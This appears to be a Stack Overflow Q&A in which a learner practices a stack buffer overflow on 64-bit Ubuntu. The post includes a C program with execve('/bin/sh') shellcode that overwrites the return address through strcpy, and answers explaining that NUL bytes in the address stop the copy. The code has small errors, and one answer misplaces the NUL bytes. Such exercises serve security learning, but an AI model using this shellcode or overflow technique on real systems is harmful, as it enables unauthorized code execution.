# exploitation on 64 bit Ubuntu

Tags: c, ubuntu, assembly, gdb

Hi I was practicing exploitation on 64 bit Ubuntu and during my examination of the source code  I realized that the address of the buffer (0x7fffffffddd0) placed in large_string contains zeros.

```
(gdb) x/gx large_string
0x6010c0 <large_string>:    0x00007fffffffddd0
(gdb) x/bx large_string
0x6010c0 <large_string>:    0xd0
(gdb) x/bx large_string + 1
0x6010c1 <large_string+1>:  0xdd
(gdb) x/bx large_string + 2
0x6010c2 <large_string+2>:  0xff
(gdb) x/bx large_string + 3
0x6010c3 <large_string+3>:  0xff
(gdb) x/bx large_string + 4
0x6010c4 <large_string+4>:  0xff
(gdb) x/bx large_string + 5
0x6010c5 <large_string+5>:  0x7f
(gdb) x/bx large_string + 6
0x6010c6 <large_string+6>:  0x00
(gdb) x/bx large_string + 7
0x6010c7 <large_string+7>:  0x00
```

The strcpy function works just fine and copies the first 44 bytes of the large_string which contains the shellcode but after that something goes wrong.

My question is does the compiler interpret these zeros as null byte during a call to strcpy?If yes, what should I do to resolve this problem?

```
   #include <stdio.h>
   #include <string.h>

shellcode[] = "\xeb\x1e\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8b\x56\x0c\xcd\x80\xb0\x01\x31\xdb"
              "\xcd\x80\xe8\xdd\xff\xff\xff/bin/sh"

char large_string[200];
int main(int argc, char *argv[]){
    char buffer[96];
    int i;
    unsigned long *long_ptr;
    long_ptr = (unsigned long *) large_string;

    for(i = 0; i<25; i++)
        *(long_ptr + i) = (unsigned long) buffer;
    for(i = 0; i<strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    strcpy(buffer,large_string);
}
```

Answer (score 0):

The `strcpy` function stops copying when it encounters a NUL byte.  Since `shellcode` contains NUL bytes you can't use that function to copy.  You should instead use `memcpy`, which will copy the specified number of bytes from one buffer to another:

```
memcpy(buffer,large_string,sizeof(large_string));
```

Comment: you know that I am trying to overflow the buffer and overwrite the ret address with the address of the buffer.

Comment: In that case the third parameter should be the size of `large_string`.  I've updated to reflect.

Comment: thanks for your reply but the question still remains unanswered.Are the zeros at the end of the buffer address interpreted as null bytes by the strcpy?

Comment: Yes, zero bytes and NUL bytes are the same thing.  So once `strcpy` encounters one of those bytes it stops.

Comment: @LDS Does that make more sense?

Comment: @LDS  Glad I could help.  Feel free to [accept this answer](http://stackoverflow.com/help/accepted-answer) if you found it useful.